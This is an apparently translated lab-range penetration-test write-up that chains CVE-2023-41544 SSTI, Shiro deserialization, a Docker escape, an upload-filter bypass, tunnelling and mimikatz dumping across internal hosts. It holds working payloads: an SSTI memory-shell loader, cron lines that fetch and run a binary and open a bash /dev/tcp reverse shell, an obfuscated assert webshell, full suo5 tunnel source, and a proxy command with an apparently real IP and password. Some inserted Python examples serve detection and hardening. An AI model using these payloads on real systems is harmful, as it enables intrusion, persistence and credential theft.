wuxian target practice notes: monthly challenge

Entry machine: 10.10.0.3

Use several scanning tools for port probing, fingerprinting and so on, and cross-check their results.

TscanPlus scan: results as follows:

ID Host Port Protocol Target Banner Code Title
1 10.10.0.3 22 SSH 10.10.0.3:22 OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 0
2 10.10.0.3 3306 MYSQL 10.10.0.3:3306 MySQL 8.0.19 0
3 10.10.0.3 6379 REDIS 10.10.0.3:6379 Redis key-value store 5.0.14 0
4 10.10.0.3 18080 HTTP http://10.10.0.3:18080 APACHE-Shiro 200 DocToolkit
5 10.10.0.3 18088 HTTP http://10.10.0.3:18088 Apache-Tomcat 404 HTTP Status 404 – Not Found

fscan scan: results as follows

A weak password was found; cross-check it with tscan's brute-force module

There is indeed a MySQL weak password, and the database is exposed. Save the information collected so far.

Directory probing of the HTTP sites:

Several brute-force tools could be used here; for convenience I just scan with tscanplus.

The following information was found:

http://10.10.0.3:18088/

Some information about jeecg-boot shows up here; flag it with a question mark and come back later for deeper analysis and digging.

http://10.10.0.3:18080/

The directories above were found:

DocToolkit is visible; again flag it for in-depth research later.


MySQL weak password root/root; connect directly with Navicat:

Traces of jeecg-boot turn up again, matching what was seen above.


10.10.0.3 - JimuReport (积木报表) SSTI:

http://10.10.0.3:18088/jeecg-boot/

Look up known historical vulnerabilities to exploit:

Use the jeecg-boot tool bundled in One-fox to probe for vulnerabilities

Use the built-in tool directly to get RCE:

This is a Java SSTI; the CVE is CVE-2023-41544. Manual reproduction as follows

PoC:

POST /jeecg-boot/jmreport/loadTableData HTTP/1.1
Host: 10.10.0.3:18088
Content-Length: 165
Cache-Control: max-age=0
Origin: http://10.10.0.3:18088
Content-Type: application/json
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://10.10.0.3:18088/jeecg-boot/
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

{"dbSource":"","sql":"select '<#assign value=\"freemarker.template.utility.Execute\"?new()>${value(\"whoami\")}'","tableName":"test_demo);","pageNo":1,"pageSize":10}

Try to inject a memory shell through the SSTI:

Use the java-memshell-generator tool to generate the base64-encoded memory shell:


This is the Behinder (冰蝎) memory shell I generated:

Insert the encoded memory shell into the payload:

{"sql":"call${\"freemarker.template.utility.ObjectConstructor\"?new()(\"javax.script.ScriptEngineManager\").getEngineByName(\"js\").eval(\"classLoader=java.lang.Thread.currentThread().getContextClassLoader();try{classLoader.loadClass('org.apachen.SOAPUtils').newInstance();}catch(e){clsString=classLoader.loadClass('java.lang.String');bytecodeBase64='这里填入base64的内存马';try{clsBase64=classLoader.loadClass('java.util.Base64');clsDecoder=classLoader.loadClass('java.util.Base64$Decoder');decoder=clsBase64.getMethod('getDecoder').invoke(base64Clz);bytecode=clsDecoder.getMethod('decode',clsString).invoke(decoder,bytecodeBase64);}catch(ee){try{datatypeConverterClz=classLoader.loadClass('javax.xml.bind.DatatypeConverter');bytecode=datatypeConverterClz.getMethod('parseBase64Binary',clsString).invoke(datatypeConverterClz,bytecodeBase64);}catch(eee){clazz1=classLoader.loadClass('sun.misc.BASE64Decoder');bytecode=clazz1.newInstance().decodeBuffer(bytecodeBase64);}}clsClassLoader=classLoader.loadClass('java.lang.ClassLoader');clsByteArray=(''.getBytes().getClass());clsInt=java.lang.Integer.TYPE;defineClass=clsClassLoader.getDeclaredMethod('defineClass',[clsByteArray,clsInt,clsInt]);defineClass.setAccessible(true);clazz=defineClass.invoke(classLoader,bytecode,0,bytecode.length);clazz.newInstance();};

The exploitation tool cannot inject the memory shell automatically here, so I tried injecting it by hand:

After the Behinder memory shell was injected successfully:

Connected successfully, as shown below:
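Added defender-side example (not part of this writeup): a Python check of the kind a WAF rule or log review for the jmreport endpoint would implement, flagging request bodies that carry FreeMarker template syntax together with the utility classes the two payloads above rely on. The four sample requests are constructed; the first two reuse the payload shapes shown on this page, the last two are benign.

```python
import json
import re

# FreeMarker syntax that should never appear inside data a report endpoint
# receives: directives (<#assign ...>), interpolations (${...}) and the
# ?new built-in, which instantiates arbitrary classes.
FREEMARKER_SYNTAX = re.compile(r"<#\s*assign\b|\$\{[^}]*\}|\?new\s*\(", re.IGNORECASE)

# Classes that turn template evaluation into code execution.
DANGEROUS_CLASSES = (
    "freemarker.template.utility.Execute",
    "freemarker.template.utility.ObjectConstructor",
    "javax.script.ScriptEngineManager",
)


def classify_body(body: str) -> dict:
    """Verdict for one request body.

    severity is 'high' when template syntax and a code-execution helper class
    occur together, 'suspicious' when only one of them does, else 'none'.
    """
    has_syntax = FREEMARKER_SYNTAX.search(body) is not None
    classes = [c for c in DANGEROUS_CLASSES if c in body]
    if has_syntax and classes:
        severity = "high"
    elif has_syntax or classes:
        severity = "suspicious"
    else:
        severity = "none"
    return {"severity": severity, "template_syntax": has_syntax, "classes": classes}


def scan_requests(records):
    """records: iterable of (path, body) pairs. Returns the findings above 'none'."""
    findings = []
    for path, body in records:
        verdict = classify_body(body)
        if verdict["severity"] != "none":
            findings.append({"path": path, **verdict})
    return findings


# Constructed sample traffic. The first body is the PoC from this page, the
# second has the shape of the memory-shell variant (script body elided), the
# third is ordinary JSON, the fourth has an interpolation but no helper class.
SAMPLE_REQUESTS = [
    ("/jeecg-boot/jmreport/loadTableData", json.dumps({
        "dbSource": "",
        "sql": "select '<#assign value=\"freemarker.template.utility.Execute\"?new()>${value(\"whoami\")}'",
        "tableName": "test_demo);", "pageNo": 1, "pageSize": 10})),
    ("/jeecg-boot/jmreport/loadTableData", json.dumps({
        "sql": "call${\"freemarker.template.utility.ObjectConstructor\"?new()"
               "(\"javax.script.ScriptEngineManager\").getEngineByName(\"js\").eval(\"...\")}"})),
    ("/jeecg-boot/jmreport/loadTableData", json.dumps({
        "dbSource": "", "sql": "select id, name from test_demo", "pageNo": 1, "pageSize": 10})),
    ("/jeecg-boot/jmreport/loadTableData", json.dumps({"sql": "select '${title}'"})),
]

if __name__ == "__main__":
    for finding in scan_requests(SAMPLE_REQUESTS):
        print(finding["severity"], finding["path"], finding["classes"])
```

The 'suspicious' tier exists because a bare `${...}` can be legitimate report syntax; the combination with `?new` or one of the listed classes is what should block the request outright.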

10.10.0.3 - Shiro deserialization

http://10.10.0.3:18080/

After getting the webshell, some commands were unavailable, so I went straight on to the next round of information gathering:

Found the DocToolkit source, pulled it down and decompiled it

Decompile the jar with jadx:

Browsing through the result yields the Shiro key

QZIysgMYhG7/CzIJlVpR1g==

Open the Shiro deserialization exploitation tool bundled in One-fox

Detection successful:

Run a command:

Inject a memory shell:

192.168.80.50 - Docker container escape

Related article worth reading:

https://xz.aliyun.com/t/12495?time__1311=GqGxRQq7qeuDlrzQ0%3DGOjqLb%3DAKKG8IeD

Uploaded fscan and scanned the internal network:

[*] LiveTop 172.18.0.0/16    段存活数量为: 2
[*] LiveTop 172.18.0.0/24 段存活数量为: 2
172.18.0.1:22 open
172.18.0.2:8080 open
172.18.0.1:6379 open
172.18.0.1:3306 open
172.18.0.1:18080 open
172.18.0.1:18088 open
[*] WebTitle http://172.18.0.2:8080 code:200 len:1120 title:DocToolkit
[*] WebTitle http://172.18.0.1:18088 code:404 len:682 title:HTTP Status 404 – Not Found
[*] WebTitle http://172.18.0.1:18080 code:200 len:1120 title:DocToolkit
[+] mysql 172.18.0.1:3306:root root
[+] Redis 172.18.0.1:6379 unauthorized file:/data/dump.rdb

Something feels off; I suspect we are inside a Docker container:

find / -name .dockerenv

It does indeed exist!!

df -h (view file system information) shows

It is basically confirmed that we are inside Docker.

Common methods for escaping a Docker container

  • Kernel vulnerabilities: because a Docker container shares the kernel with the physical host, exploiting a kernel vulnerability from inside the container may give host privileges directly.
  • Unauthenticated Docker API access: when the host's Docker API is enabled and accepts unauthenticated requests, the Docker API can be used from inside the container to create a new container with the host's root directory mounted into one of its directories.
  • Container started in privileged mode: when the container runs in privileged mode, mount can be used to mount the host's root directory onto a directory inside the current container.

Use the CDK tool to check whether the Docker container has insecure configuration or vulnerabilities

CDK: https://github.com/cdk-team/CDK

Check the process's cgroup: it is clearly a Docker environment

Check the container's environment variables: outside Docker this normally produces no output, which confirms once more that this is a Docker environment

/proc/1/environ

Contents:

PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/lib/jvm/java-1.8-openjdk/jre/bin:/usr/lib/jvm/java-1.8-openjdk/binHOSTNAME=25313452973fFLAG=flag{N1c3_sHirO_fuCK}LANG=C.UTF-8JAVA_HOME=/usr/lib/jvm/java-1.8-openjdkJAVA_VERSION=8u212JAVA_ALPINE_VERSION=8.212.04-r0HOME=/rootLD_LIBRARY_PATH=/usr/lib/jvm/java-1.8-openjdk/jre/lib/amd64/server:/usr/lib/jvm/java-1.8-openjdk/jre/lib/amd64:/usr/lib/jvm/java-1.8-openjdk/jre/../lib/amd64

Upload the cdk tool and run it; results as follows:

chmod +x /tmp/cdk_linux_amd64
/tmp/cdk_linux_amd64 evaluate --full

It did not seem to help much, though, or perhaps I just do not know how to use it well yet, haha.

After some digging:

Found a mounted directory: /dev/tmp

What is mounted there is a directory of the host machine

The real host's directory contents are right here inside our Docker container, so we just need to write into this directory:

Escape via a cron job through the mount

echo "*/1 * * * * root wget http://公网ip:9999/icon_54321.elf -o /tmp/qwert1234" > /dev/tmp/etc/cron.d/sysstat
echo "*/1 * * * * root chmod 755 /tmp/qwert1234" > /dev/tmp/etc/cron.d/sysstat
echo "*/1 * * * * root /tmp/qwert1234" > /dev/tmp/etc/cron.d/sysstat

Alternatively, get a reverse shell via a cron job through the mount

echo '*/1 * * * * root bash -c "bash -i >& /dev/tcp/公网IP/9999 0>&1" ' > /dev/tmp/etc/cron.d/sysstat

Wait one minute and the shell comes back

Of course you could also write a shell script here and use the cron job to escape; not demonstrating that further.
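Added example, not from the original writeup: a Python audit of a container's own /proc/self/mountinfo that flags exactly the misconfiguration used above (a whole host filesystem bind-mounted writable inside the container) plus an exposed Docker socket, together with a helper that encodes the page's two "am I in Docker" checks. The mountinfo text and cgroup line are constructed samples; the filesystem list and sensitive-path list are my own choices.

```python
import re

# Filesystems that back a real disk; a bind mount with root "/" from one of
# these exposes an entire host filesystem, not a single file or directory.
DISK_FS = {"ext2", "ext3", "ext4", "xfs", "btrfs", "zfs"}
# Host directories that, if mounted, let a process inside run code outside
# (cron.d under /etc is the one the writeup uses).
SENSITIVE_HOST_PATHS = ("/etc", "/root", "/home")


def parse_mountinfo(text: str) -> list:
    """Parse /proc/self/mountinfo lines into dicts (field layout per proc(5))."""
    mounts = []
    for line in text.splitlines():
        if not line.strip():
            continue
        left, _, right = line.partition(" - ")
        lf, rf = left.split(), right.split()
        if len(lf) < 6 or len(rf) < 2:
            continue
        mounts.append({
            "root": lf[3],                   # path inside the source filesystem
            "mount_point": lf[4],            # path inside the container
            "options": set(lf[5].split(",")),
            "fstype": rf[0],
            "source": rf[1],
        })
    return mounts


def audit_mounts(mounts: list) -> list:
    """Flag mounts that hand the container a foothold on the host."""
    findings = []
    for m in mounts:
        reason = None
        if m["fstype"] in DISK_FS and m["root"] == "/" and m["mount_point"] != "/":
            reason = "entire host filesystem mounted at " + m["mount_point"]
        elif m["root"].endswith("docker.sock"):
            reason = "Docker daemon socket exposed at " + m["mount_point"]
        elif m["fstype"] in DISK_FS and m["root"].startswith(SENSITIVE_HOST_PATHS):
            reason = "sensitive host path %s mounted at %s" % (m["root"], m["mount_point"])
        if reason:
            findings.append({
                "mount_point": m["mount_point"],
                "root": m["root"],
                "severity": "critical" if "rw" in m["options"] else "high",
                "reason": reason,
            })
    return findings


def container_indicators(cgroup_text: str, has_dockerenv: bool) -> list:
    """The page's two checks: /.dockerenv and a container runtime in the cgroup path."""
    reasons = []
    if has_dockerenv:
        reasons.append("/.dockerenv exists")
    if re.search(r"/(docker|containerd|kubepods)[/-]", cgroup_text):
        reasons.append("cgroup path names a container runtime")
    return reasons


# Constructed sample: an overlay rootfs, the usual resolv.conf bind mount, the
# host root disk at /dev/tmp (the case above) and a bind-mounted docker.sock.
SAMPLE_MOUNTINFO = """\
731 730 0:50 / / rw,relatime - overlay overlay rw,lowerdir=/var/lib/docker/overlay2/l/AAA:/var/lib/docker/overlay2/l/BBB
732 731 0:52 / /proc rw,nosuid,nodev,noexec,relatime - proc proc rw
733 731 8:1 /var/lib/docker/containers/abc123/resolv.conf /etc/resolv.conf rw,relatime - ext4 /dev/sda1 rw
734 731 8:1 / /dev/tmp rw,relatime - ext4 /dev/sda1 rw
735 731 0:24 /docker.sock /run/docker.sock rw,nosuid,nodev - tmpfs tmpfs rw,mode=755
"""

if __name__ == "__main__":
    # On a live system read open("/proc/self/mountinfo").read() instead.
    for f in audit_mounts(parse_mountinfo(SAMPLE_MOUNTINFO)):
        print(f["severity"], f["reason"])
    print(container_indicators("12:memory:/docker/abc123", True))
```

The writable host-root finding is the one that matters: with it, anything under the host's /etc/cron.d is reachable from inside, which is why the escape above needs no kernel bug or privileged flag. The fix is on the host side (do not bind-mount host directories into the container, or mount them read-only and narrowly), and this check belongs in image or runtime policy rather than in a container's own startup.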

After the reverse shell came back, we found the real network interface:

After escaping to the host, use the venom tool to quickly set up a proxy into the internal segment 192.168.80.50/24

192.168.80.55 - File upload WAF bypass

Upload tools: fscan and chfs; use fscan to scan the internal network

Found an internal host, 192.168.80.55, with port 80 open

./fscan -h 192.168.80.0/24

___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.4
start infoscan
(icmp) Target 192.168.80.50 is alive
(icmp) Target 192.168.80.55 is alive
[*] Icmp alive hosts len is: 2
192.168.80.50:22 open
192.168.80.55:139 open
192.168.80.55:135 open
192.168.80.55:80 open
192.168.80.50:80 open
192.168.80.50:6379 open
192.168.80.50:3306 open
192.168.80.55:445 open
192.168.80.50:18088 open
192.168.80.50:18080 open
[*] alive ports len is: 10
start vulscan
[*] WebTitle http://192.168.80.50 code:200 len:9483 title:None
[*] NetBios 192.168.80.55 WORKGROUP\WIN-P5VV23D2I7P Windows Server 2008 R2 Datacenter 7601 Service Pack 1
[*] WebTitle http://192.168.80.55 code:200 len:11 title:None
[*] OsInfo 192.168.80.55 (Windows Server 2008 R2 Datacenter 7601 Service Pack 1)
[*] WebTitle http://192.168.80.50:18088 code:404 len:682 title:HTTP Status 404 – Not Found
[+] mysql 192.168.80.50:3306:root root
[*] WebTitle http://192.168.80.50:18080 code:200 len:1120 title:DocToolkit
[+] Redis 192.168.80.50:6379 unauthorized file:/data/dump.rdb

Successfully pivoted into the internal network:

Run a directory scan against it and export the results to an Excel sheet; a sensitive path turns up: /web.php

This is a file upload point:

After some testing: it uses a blacklist that disallows files with the php extension, and it also restricts file content, blocking some sensitive functions and the like.

Try uploading .htaccess

<FilesMatch "a.jpg">
SetHandler application/x-httpd-php
</FilesMatch>

Try an AV-evading webshell

<?php
$a='assert';
$b='_GET';
$c=$$b;
$a($c['id']);
?>

The reason for using $_GET['id'] is that with assert($_POST[1]) you cannot connect directly with AntSword (蚁剑); only eval($_POST[1]) connects directly. So I use assert($_GET['id']) as a relay, and AntSword then connects successfully, as follows:
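Added defender-side example (not part of the writeup): the blacklist above fails because it filters names and keywords instead of deciding what is allowed. This Python validator shows the allowlist form: exactly one extension from a fixed set, no dotfiles (which rules out .htaccess), magic bytes that match the claimed type, no PHP open tag, and a random stored name. The sample uploads are constructed from the names and contents shown on this page; the size limit and type table are my choices.

```python
import secrets
from pathlib import PurePosixPath

# Allowlisted extensions and the magic bytes a file of that type must start with.
ALLOWED_TYPES = {
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}
MAX_SIZE = 2 * 1024 * 1024


def validate_upload(filename: str, content: bytes):
    """Return (ok, reason, stored_name).

    Rejects dotfiles such as .htaccess, names with more or fewer than one
    extension, extensions outside the allowlist, content whose magic bytes do
    not match the claimed type, and a PHP open tag anywhere in the body.
    """
    name = PurePosixPath(filename).name          # drop any directory components
    if not name or name.startswith("."):
        return False, "dotfile or empty name", None
    parts = name.split(".")
    if len(parts) != 2 or not parts[0]:
        return False, "exactly one extension required", None
    ext = parts[1].lower()
    if ext not in ALLOWED_TYPES:
        return False, "extension not allowed: " + ext, None
    if len(content) > MAX_SIZE:
        return False, "file too large", None
    if not content.startswith(ALLOWED_TYPES[ext]):
        return False, "content does not match " + ext + " magic bytes", None
    if b"<?php" in content or b"<?=" in content:
        return False, "PHP open tag inside image", None
    # Never reuse the client's name: random name plus the verified extension.
    return True, "ok", secrets.token_hex(16) + "." + ext


# Constructed sample uploads covering the cases from the page and a clean image.
JPEG_HEAD = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00"
SAMPLE_UPLOADS = [
    (".htaccess", b'<FilesMatch "a.jpg">\nSetHandler application/x-httpd-php\n</FilesMatch>\n'),
    ("shell.php", b"<?php $a='assert'; $b='_GET'; $c=$$b; $a($c['id']); ?>"),
    ("a.php.jpg", JPEG_HEAD),                    # double extension
    ("a.jpg", b"<?php $a='assert'; ?>"),          # claims JPEG, carries PHP
    ("a.jpg", JPEG_HEAD + b"<?php echo 1; ?>"),  # real header, PHP appended
    ("../../a.jpg", JPEG_HEAD + bytes(32)),      # clean image, traversal in the name
]


def run_samples():
    """Return [(filename, ok, reason), ...] for the constructed samples."""
    return [(name, *validate_upload(name, body)[:2]) for name, body in SAMPLE_UPLOADS]


if __name__ == "__main__":
    for name, ok, reason in run_samples():
        print("ACCEPT" if ok else "REJECT", name, reason)
```

The content checks are defence in depth only; what actually closes the .htaccess trick is the web server configuration: AllowOverride None on the upload directory and no PHP handler there, so an uploaded file is served as static data whatever its name.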

Connected successfully through the proxy!

Check its processes:

Huorong (火绒) AV is running!

At this layer I first tried building the multi-level proxy with venom, but it was obviously killed straight away. Other people's writeups built the multi-level proxy by dropping in stowaway; I suspect that is because stowaway is still maintained and relatively recent, so Huorong does not intercept and kill it. Here, though, I built the tunnel into the 192.168.81.22 segment directly with an AV-evading suo5.

Evasion code as follows:

suo.php

<?php
error_reporting(E_ERROR | E_PARSE);
ini_set('display_errors', 0);
ini_set('display_startup_errors', 0);
ini_set("allow_url_fopen", true);
ini_set("allow_url_include", true);
ini_set('always_populate_raw_post_data', -1);

// bypass session lock
ini_set('session.use_only_cookies', false);
ini_set('session.use_cookies', false);
ini_set('session.use_trans_sid', false);
ini_set('session.cache_limiter', null);
if (array_key_exists('PHPSESSID', $_COOKIE)) {
session_id($_COOKIE['PHPSESSID']);
} else {
session_start();
setcookie('PHPSESSID', session_id());
session_write_close();
}

// disable output buffering
@ini_set('zlib.output_compression', 0);
ob_implicit_flush(true);
while (ob_get_level()) {
ob_end_clean();
}

if (version_compare(PHP_VERSION, '5.4.0', '>=')) @http_response_code(200);

function xlpassxpukcLmU()
{
$ua = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : '';
if ($ua != 'Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.1.2.3') {
return false;
}
if ($_SERVER['CONTENT_TYPE'] == 'application/plain') {
$read_data = file_get_contents('php://input', 0, null, 0, 32);
echo $read_data;
return false;
}
return true;
}

function xlpassOEgojXTR($client_id, $data)
{
$exist = false;
session_start();
if (isset($_SESSION[$client_id . '_ok'])) {
$exist = true;
$_SESSION[$client_id . '_buf'] .= $data;
}
session_write_close();
return $exist;
}


function xlpassHvUNfPam($client_id)
{
session_start();
if (isset($_SESSION[$client_id . '_ok'])) {
$_SESSION[$client_id . '_ok'] = false;
};
session_write_close();
}

function xlpassCgPzfQOO($client_id)
{
session_start();
$_SESSION[$client_id . '_buf'] = '';
$_SESSION[$client_id . '_ok'] = true;
session_write_close();
}

function xlpassEtbOsRDk()
{
$body = file_get_contents('php://input');
$data_map = xlpassxZHdjSBv($body);
$client_id = $data_map['id'];
$actions = $data_map['ac'];
if (strlen($actions) != 1) return;
$action = ord($actions[0]);

if ($action == 0x02) {
xlpassHvUNfPam($client_id);
return;
} elseif ($action == 0x01) {
$exist = xlpassOEgojXTR($client_id, $data_map['dt']);
if (!$exist) {
echo xlpassGSuTOKsO(new_del());
}
return;
}

if ($action != 0x00) return;
header('X-Accel-Buffering: no');
header('Content-Type: application/octet-stream');
header("Connection: Keep-Alive");
set_time_limit(0);

$host = $data_map['h'];
$ip = gethostbyname($host);
$port_str = trim($data_map['p']);
if ($port_str == '0') {
$port_str = isset($_SERVER['SERVER_PORT']) ? $_SERVER['SERVER_PORT'] : '80';
}
$port = intval($port_str);

$remote_sock = @fsockopen($ip, $port, $errno, $errstr, 3);
if ($remote_sock) {
stream_set_blocking($remote_sock, false);
// ignore_user_abort(true);
$read_from = $remote_sock;
xlpassCgPzfQOO($client_id);
echo xlpassGSuTOKsO(new_status(0x00));
} else {
echo xlpassGSuTOKsO(new_status(0x01));
return;
}

$ok_key = $client_id . '_ok';
$buf_key = $client_id . '_buf';

$last_buf_time = time();
while (!feof($read_from)) {
$remote_data = fread($read_from, 32 * 1024);
if ($remote_data === false) {
break;
}
if (strlen($remote_data) !== 0) {
echo xlpassGSuTOKsO(new_data($remote_data));
}

session_start();
if (!isset($_SESSION[$ok_key]) || $_SESSION[$ok_key] !== true) {
unset($_SESSION[$ok_key]);
unset($_SESSION[$buf_key]);
session_write_close();
break;
}
if (strlen($_SESSION[$buf_key]) !== 0) {
$last_buf_time = time();
fwrite($read_from, $_SESSION[$buf_key]);
$_SESSION[$buf_key] = '';
}

// compute client count
$client_count = 0;
foreach ($_SESSION as $key => $value) {
if (substr($key, -3) == '_ok') {
$client_count++;
}
}
session_write_close();

if (time() - $last_buf_time > 60) {
break;
}
usleep(50000);
}

session_start();
unset($_SESSION[$ok_key]);
unset($_SESSION[$buf_key]);
session_write_close();
fclose($read_from);
echo xlpassGSuTOKsO(new_del());
}

function xlpassGSuTOKsO($m)
{
$buf = '';
foreach ($m as $key => $value) {
$buf .= chr(strlen($key)) . $key . pack('N', strlen($value)) . $value;
}
$xor_key = chr(mt_rand(0, 255));
$data = '';
for ($i = 0; $i < strlen($buf); $i++) {
$data .= chr(ord($buf[$i]) ^ ord($xor_key));
}
return pack('N', strlen($data)) . $xor_key . $data;
}

function xlpassxZHdjSBv($body)
{
$len = unpack('N', substr($body, 0, 4))[1];
$xor = ord(substr($body, 4, 1));
$data = substr($body, 5);
if ($len > 1024 * 1024 * 32) {
throw new Exception('invalid len');
}
if (strlen($data) != $len) {
throw new Exception('invalid data');
}
$decoded = '';
for ($i = 0; $i < strlen($data); $i++) {
$decoded .= chr(ord($data[$i]) ^ $xor);
}
$m = array();
$i = 0;
while ($i < strlen($decoded) - 1) {
$k_len = ord($decoded[$i]);
$i++;
if ($k_len < 0 || $i + $k_len >= strlen($decoded)) break;
$key = substr($decoded, $i, $k_len);
$i += $k_len;
if ($i + 4 >= strlen($decoded)) break;
$v_len = unpack('N', substr($decoded, $i, 4))[1];
$i += 4;
if ($v_len < 0 || $i + $v_len > strlen($decoded)) break;
$value = substr($decoded, $i, $v_len);
$i += $v_len;
$m[$key] = $value;
}
return $m;
}

function new_del()
{
return array('ac' => chr(0x02));
}

function new_status($b)
{
return array('s' => chr($b));
}

function new_data($data)
{
return array('ac' => chr(0x01), 'dt' => $data);
}

if (xlpassxpukcLmU()) {
try {
xlpassEtbOsRDk();
} catch (Exception $ex) {
}
}

I started a suo5 client locally and built an HTTP tunnel between the two internal networks; from what I have read, the transfer quality of this tunnel is also quite good.
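For incident responders who find a file like the one above: the following Python (an added example, not part of suo5 or of this writeup) re-implements the frame format from the PHP, so captured request bodies can be decoded into the id/ac/h/p fields and a request can be classified as suo5 traffic by the fixed User-Agent plus a parseable frame. The frame in the test is constructed with the same encoder; the action names are my labels for the 0x00/0x01/0x02 codes the PHP dispatches on.

```python
import os
import struct

# The fixed User-Agent the PHP server insists on before it does anything.
SUO5_USER_AGENT = ("Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) "
                   "AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.1.2.3")
ACTION_NAMES = {0x00: "connect", 0x01: "data", 0x02: "delete"}
MAX_FRAME = 32 * 1024 * 1024   # same ceiling the PHP enforces


def encode_frame(fields: dict, xor_key=None) -> bytes:
    """Build a frame the way the PHP encoder does (used here to create test input).

    Layout: 4-byte big-endian length, 1-byte XOR key, then XOR-masked
    entries of [1-byte key length][key][4-byte value length][value].
    """
    buf = b""
    for key, value in fields.items():
        k = key.encode()
        buf += bytes([len(k)]) + k + struct.pack(">I", len(value)) + value
    if xor_key is None:
        xor_key = os.urandom(1)[0]
    data = bytes(b ^ xor_key for b in buf)
    return struct.pack(">I", len(data)) + bytes([xor_key]) + data


def decode_frame(body: bytes) -> dict:
    """Inverse of encode_frame; raises ValueError on anything that is not a frame."""
    if len(body) < 5:
        raise ValueError("too short")
    (length,) = struct.unpack(">I", body[:4])
    xor_key = body[4]
    data = body[5:]
    if length > MAX_FRAME or len(data) != length:
        raise ValueError("length mismatch")
    decoded = bytes(b ^ xor_key for b in data)
    fields, i = {}, 0
    while i < len(decoded) - 1:
        k_len = decoded[i]
        i += 1
        if i + k_len >= len(decoded):
            break
        key = decoded[i:i + k_len].decode("latin-1")
        i += k_len
        if i + 4 > len(decoded):
            break
        (v_len,) = struct.unpack(">I", decoded[i:i + 4])
        i += 4
        if i + v_len > len(decoded):
            break
        fields[key] = decoded[i:i + v_len]
        i += v_len
    return fields


def describe_frame(fields: dict) -> dict:
    """Summarise a decoded client frame for an analyst."""
    action = fields.get("ac", b"")
    code = action[0] if len(action) == 1 else None
    return {
        "action": ACTION_NAMES.get(code, "unknown"),
        "client_id": fields.get("id", b"").hex(),
        "host": fields.get("h", b"").decode("latin-1"),
        "port": fields.get("p", b"").decode("latin-1"),
        "payload_len": len(fields.get("dt", b"")),
    }


def is_suo5_request(headers: dict, body: bytes) -> bool:
    """True when a request carries the fixed UA and its body parses as a frame
    with the mandatory id/ac fields; either signal alone is weaker."""
    if headers.get("User-Agent", "") != SUO5_USER_AGENT:
        return False
    try:
        fields = decode_frame(body)
    except ValueError:
        return False
    return "id" in fields and "ac" in fields


if __name__ == "__main__":
    # Constructed: a client asking the tunnel to open 192.168.81.20:7001.
    sample = encode_frame({"id": bytes(range(8)), "ac": b"\x00",
                           "h": b"192.168.81.20", "p": b"7001"})
    print(describe_frame(decode_frame(sample)))
```

In a proxy or WAF log the same file shows up as a long-lived POST to a .php path in an uploads directory with Content-Type application/octet-stream in the response; the "connect" frames are the useful ones for scoping, since their h/p fields list every internal host the operator reached through the tunnel.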

First write the proxy as follows:

socks5://用户名:密码@公网IP:端口

Set up successfully:

Linux proxy:

./suo5-linux-amd64 -t http://192.168.80.55/uploads/suo.php -l 0.0.0.0:7788 --proxy socks5://admin:ikvDbHGO@42.193.105.220:42584

With this proxy the 192.168.81.0/24 segment can be reached

Reached: http://192.168.81.20:7001

Be patient here: launch the Java program from the command line so that it goes through the SOCKS proxy socks5://127.0.0.1:1080

G:\all_tools\One-fox\ONE-FOX集成工具箱_V8.2公开版_by狐狸\Java_path\Java_8_win\bin\java.exe -DsocksProxyHost=127.0.0.1
-DsocksProxyPort=1080 -jar WeblogicTool_1.3.jar

Reference article: "Part 12: How to put any Java program behind a SOCKS5 proxy" (第12篇:给任意java程序挂Socks5代理方法_java socks5-CSDN博客)

192.168.81.22 - WebLogic

The following vulnerabilities were detected:

Try a one-shot exploit and inject a memory shell

2024-12-12 10:37:04:哥斯拉4 Servlet内存马Payload已发送,请自行测试!
URL: http://192.168.81.20:7001/bea_wls_internal/app 密码:123456 秘钥:key

In the end it never succeeded, and I am not sure exactly why (I have decided to study it more carefully later). I then switched to stowaway for the multi-level proxy; because that Huorong version is relatively old, this was enough to get past Huorong.

Steps:

Start a listener on the public IP:
./stowaway_admin -l 9999

192.168.80.55 connects back to the listener:
./stowaway_agent -c 公网ip:9999

Once the connection is up, to use this node run:
(admin)>use 0

Start a listener on 192.168.80.55:
stowaway_admin.exe -l 9999

Then on node 0:
connect out to 192.168.80.55:9999
(node 0)> connect 192.168.80.55:9999

After connecting
(node 0)> back
leave node 0 and return to (admin)

Enter node 1
(admin)>use 1

Open a SOCKS proxy
(node 1)>socks 1080

Once this proxy is up, the CVE can be used to write the memory shell successfully:

Connected successfully through the proxy:

After getting the webshell, check the processes:

No AV found:

Checking the IP configuration reveals a new segment, 192.168.77.0/24

Since the privileges are Administrator, use Godzilla's (哥斯拉) built-in mimikatz to grab credentials

"privilege::debug" "sekurlsa::logonpasswords" "exit" 
ok

.#####. mimikatz 2.2.0 (x64) #19041 Aug 10 2021 17:19:53
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # privilege::debug
Privilege '20' OK

mimikatz(commandline) # sekurlsa::logonpasswords

Authentication Id : 0 ; 375046 (00000000:0005b906)
Session : Interactive from 2
User Name : weblogic
Domain : C3TING
